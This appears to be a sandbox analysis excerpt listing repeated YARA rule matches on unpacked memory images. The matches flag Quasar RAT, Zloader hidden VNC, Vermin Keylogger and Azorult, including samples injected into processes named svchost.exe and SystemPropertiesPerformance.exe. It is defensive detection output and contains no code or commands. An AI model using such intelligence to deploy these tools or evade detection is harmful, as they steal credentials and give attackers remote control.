                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
